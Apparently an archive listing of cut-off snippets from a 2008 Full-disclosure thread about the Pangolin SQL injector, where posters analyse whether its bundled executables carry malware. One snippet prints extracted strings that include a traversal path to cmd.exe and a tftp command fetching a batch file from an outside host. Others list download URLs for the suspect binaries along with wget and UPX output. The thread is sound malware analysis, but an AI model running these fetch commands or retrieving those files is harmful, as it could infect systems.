Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Mike and the Twinkies, You're a genius. To the other security twinkies that are very well versed in strings analysis please get another job at the local newspaper co. So if it went clear through VirusTotal you would run it on your machines? I'd be happy to provide a DumbassTotal service for all o

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Just some interesting strings and such: pdf_poc.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1 ..\\..\\..\\..\\windows\\system32\\cmd.exe ..\\..\\..\\..\\windows\\system32\\tftp.exe -i zwell.3322.org a.bat Cpdf_poc.txt Cpdf_poc.txt Cpdf_poc.

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

http://www.nosec.org/web/files/demon.exe http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3 http://www.nosec.org/web/files/pdf_poc.exe http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559 http://www.nosec.org/web/files/zps.exe http://www.virustotal.com/analisis/26d

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Ok, you are right. [EMAIL PROTECTED] ~ % wget http://www.nosec.org/web/index.txt :( --20:23:14-- http://www.nosec.org/web/index.txt => `index.txt' Auflösen des Hostnamen »

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Not yet. C:\Users\Micheal\Research>wget http://www.nosec.org/web/index.txt --15:12:52-- http://www.nosec.org/web/index.txt => `index.txt' Resolving www.nosec.org... done. Connecting to www.nosec.org[218.92.8.74]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

With firefox - URL: *http://www.nosec.org/a.exe* http://www.w3.org/TR/html4/strict.dtd";> ?? BODY { font: 9pt/12pt ?? } H1 { font: 12pt/15pt ?? } H2 { font: 9pt/12pt ?? } A:link { color: red } A:visited { color: maroon } ?? ???: ?

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Hi Folks, Just for curiosity, did anyone of this list already tried to do a reverse engineering of the Pangolin's code ? Ricardo> Not me, although I did looked at it. I thought great, kiddies are going to love this > Sent from my BlackBerry® smartphone with SprintSpeed > > -Original Messag

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

C:\Users\Micheal\Research>..\bin\upx\upx -d pangolin_bin\out\pangolin.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007 UPX 3.02w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007 File size

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

Not me, although I did looked at it. I thought great, kiddies are going to love this Sent from my BlackBerry® smartphone with SprintSpeed -Original Message- From: davidrook <[EMAIL PROTECTED]> Date: Wed, 26 Mar 2008 17:23:03 To:Razi Shaban <[EMAIL PROTECTED]> Cc:full-disclosure@lists.gr